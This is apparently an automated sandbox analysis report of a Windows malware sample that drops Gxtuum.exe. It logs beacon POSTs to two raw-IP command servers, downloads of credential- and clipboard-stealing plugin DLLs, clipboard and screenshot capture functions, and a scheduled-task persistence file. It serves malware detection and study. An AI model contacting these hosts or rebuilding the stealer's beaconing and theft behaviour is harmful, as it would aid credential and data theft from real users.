r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                        Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 185.81.68.147:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 185.81.68.147:80
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002F2710 recv,recv,recv,recv,0_2_002F2710
                        Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
                        Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147
                        Source: unknownHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dll
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll
                        Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php$
                        Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php&
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php1
                        Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php6
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php8
                        Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06647000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1
                        Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1H;0
                        Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1f
                        Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1ies.
                        Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1tesH
                        Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1urn
                        Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpE
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpX
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpa
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpbf198
                        Source: rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpo
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phps
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpu
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpw
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpz#29
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ows
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/
                        Source: rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php&
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php0
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php98
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php:
                        Source: rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?R
                        Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06647000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
                        Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1b
                        Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eB
                        Source: rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1h
                        Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnN
                        Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1t
                        Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1z
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpF
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpJ
                        Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpK
                        Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpL
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpR
                        Source: rundll32.exe, 0000000C.00000002.2924024643.0000000003126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/M
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpZ
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpb
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpd7
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpded
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.2924314576.0000000000D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpf
                        Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpg
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phph
                        Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpm
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpn
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpndows
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpoded
                        Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phps
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpv
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php
                        Source: rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/SysWOW64
                        Source: rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/X
                        Source: rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/ta;
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/wsys
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2084465278.00000249B4DAF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2083831984.00000249B4DA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD6B3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                        Source: powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C0531B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,12_2_6C0531B0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C0531B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,12_2_6C0531B0
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,0_2_002E61F0
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile created: C:\Windows\Tasks\Gxtuum.jobJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E61F00_2_002E61F0
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E51A00_2_002E51A0
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003133100_2_00313310
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003263C40_2_003263C4
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E54500_2_002E5450
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003264E40_2_003264E4
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0031D5590_2_0031D559
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003247370_2_00324737
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030BBB00_2_0030BBB0
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030FDCB0_2_0030FDCB
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0031CDCD0_2_0031CDCD
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E4EF00_2_002E4EF0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000E61F01_2_000E61F0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000EB7001_2_000EB700
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000F9F311_2_000F9F31
